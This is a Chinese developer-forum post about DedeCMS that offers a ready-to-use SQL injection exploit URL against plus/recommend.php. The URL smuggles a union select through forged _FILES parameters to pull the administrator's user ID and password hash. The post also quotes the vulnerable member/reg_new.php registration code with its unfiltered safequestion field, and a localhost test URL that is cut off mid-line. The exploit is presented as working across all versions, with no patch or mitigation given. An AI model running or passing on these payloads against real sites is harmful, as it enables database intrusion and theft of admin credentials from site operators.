开发者社区> 问答> 正文

【晒安全,赢大奖】DedeCMS

测试1、
全版本通杀SQL注入
[font=Tahoma, 'Microsoft Yahei', Simsun]Exp: [font=Tahoma, 'Microsoft Yahei', Simsun]plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit 0,1),5,6,7,8,9#@`\'` &_FILES[type][name]=1.jpg&_FILES[type] [type]=application/octet-stream&_FILES[type][size]=111
[font=Tahoma, 'Microsoft Yahei', Simsun]

[font=Tahoma, 'Microsoft Yahei', Simsun]会员中心注入


<pre><code>/member/reg_new.php  $dfscores = 0;        $dfmoney = 0;        $dfrank = $dsql->GetOne("SELECT money,scores FROM `#@__arcrank` WHERE rank='10' ");        if(is_array($dfrank))        {            $dfmoney = $dfrank['money'];            $dfscores = $dfrank['scores'];        }        $jointime = time();        $logintime = time();        $joinip = GetIP();        $loginip = GetIP();        $pwd = md5($userpwd);          $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);          $inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,        `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )       VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',       '0','$spaceSta','','$c','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";//safequestion没有过滤       echo  $inQuery ;</code></pre>
[font=Tahoma, 'Microsoft Yahei', Simsun]测试方法 打开

[AppleScript] 纯文本查看 复制代码

?[table][tr][td]
1
[/td][td]127.0.0.1/dede/member/reg_new.php?dopost=regbase&step=1&mtype=

展开
收起
benq 2014-02-28 12:41:43 14631 0
0 条回答
写回答
取消 提交回答
问答分类:
问答地址:
问答排行榜
最热
最新

相关电子书

更多
高德年刊2020 立即下载
用心聆听,服务见智 立即下载
看域名行业如何变身“八爪鱼” 立即下载